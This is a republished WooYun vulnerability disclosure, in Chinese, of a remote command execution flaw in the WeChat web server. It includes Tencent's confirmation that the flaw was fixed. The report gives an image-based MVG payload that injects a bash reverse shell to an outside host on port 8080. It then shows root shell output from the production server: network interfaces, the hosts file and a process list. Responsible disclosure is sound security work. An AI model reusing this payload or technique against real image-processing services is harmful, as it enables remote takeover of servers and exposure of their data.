微信网页版服务器存在远程命令执行漏洞

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-10: 厂商已经确认,细节仅向厂商公开
2016-05-20: 细节向核心白帽子及相关领域专家公开
2016-05-30: 细节向普通白帽子公开
2016-06-09: 细节向实习白帽子公开
2016-06-24: 细节向公众公开

简要描述:

微信网页版服务器存在远程命令执行漏洞,root权限,呵呵

详细说明:

#1 存在漏洞服务器地址

https://wx2.qq.com/

#2 与自己聊天发送一个图片

wx.png



#3 payload

code 区域
push graphic-context 
viewbox 0 0 640 480
fill 'url(https://"|/bin/bash -i >& /dev/tcp/*.*.*.*/8080 0>&1")'
pop graphic-context

 

漏洞证明:

#4 获得一个远程SHELL

code 区域
[email protected]*.*:~# /sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr *.**.**.*
inet addr:223.167.*.* Bcast:223.167.*.* Mask:255.255.255.128
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:207675290974 errors:0 dropped:0 overruns:0 frame:0
TX packets:381824340869 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:64553957542020 (61563451.3 Mb) TX bytes:484719339307282 (462264384.5 Mb)

eth1 Link encap:Ethernet HWaddr *.**.**.**.*
inet addr:10.54.*.* Bcast:10.54.*.* Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:79387181028 errors:0 dropped:0 overruns:0 frame:0
TX packets:233634377039 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:604955868080734 (576930873.9 Mb) TX bytes:262973934281267 (250791487.0 Mb)

ip6tnl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1460 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:532406147 errors:0 dropped:0 overruns:0 frame:0
TX packets:532406147 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:14164026742798 (13507868.5 Mb) TX bytes:14164026742798 (13507868.5 Mb)

sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

tunl0 Link encap:IPIP Tunnel HWaddr
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

[email protected]*.*:~# cat /etc/hosts
#
# hosts This file describes a number of hostname-to-address
# mappings for the TCP/IP subsystem. It is mostly
# used at boot time, when no name servers are running.
# On small systems, this file can be used instead of a
# "named" name server.
# Syntax:
#
# IP-Address Full-Qualified-Hostname Short-Hostname
#

127.0.0.1 Tencent64.site Tencent64 localhost

# special IPv6 addresses



code 区域
root      4307     1  0 Apr08 ?        00:00:27 /usr/local/agenttools/agent/agent -c /usr/local/agenttools/agent/client.conf
root 4323 1 0 Apr08 ? 00:00:03 /usr/local/agenttools/agent/agentPlugInD
root 4341 1 0 Apr08 ? 01:37:02 /usr/local/agenttools/agent/base -d5 -c1 -m4 -s /usr/local/agenttools/agent/base.conf
root 4350 1 0 Apr08 ? 00:00:49 /usr/local/agenttools/agent/tcvmstat
root 4449 1 0 Apr08 ? 00:01:49 /usr/local/agenttools/agent/sysddd
root 6234 2 0 Jan18 ? 00:19:57 [flush-8:0]
root 6664 1 0 Jan20 ? 00:00:07 nws-watchdog
root 6665 6664 0 Jan20 ? 07:37:33 nws:http.so,worker_0-2
root 6692 2 0 Jan18 ? 00:04:48 [kjournald]
root 6693 2 0 Jan18 ? 00:05:46 [kjournald]
100 7321 1 0 Jan18 ? 00:00:05 /usr/bin/dbus-daemon --system
root 7341 1 0 Jan18 ? 00:00:01 /usr/sbin/hald --daemon=yes --retain-privileges
root 7682 1 0 15:37 ? 00:00:00 /bin/sh /usr/local/sa/agent/watchdog.sh
root 8028 1 0 15:37 ? 00:00:18 /usr/local/sa/agent/secu-tcs-agent
root 8036 1 0 Jan18 ? 00:00:00 /usr/local/sbin/sshd -f /etc/ssh2/sshd2_config.l
root 8045 1 0 Jan18 ? 00:00:00 /usr/local/sbin/sshd

 

修复方案:

# 补丁

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-10 10:29

厂商回复:

非常感谢您的报告,IM组件的问题,已经有白帽子在tsrc平台报告过,此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:微信网页版服务器存在远程命令执行漏洞 - https://www.15qq.cn/wooyun/602.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知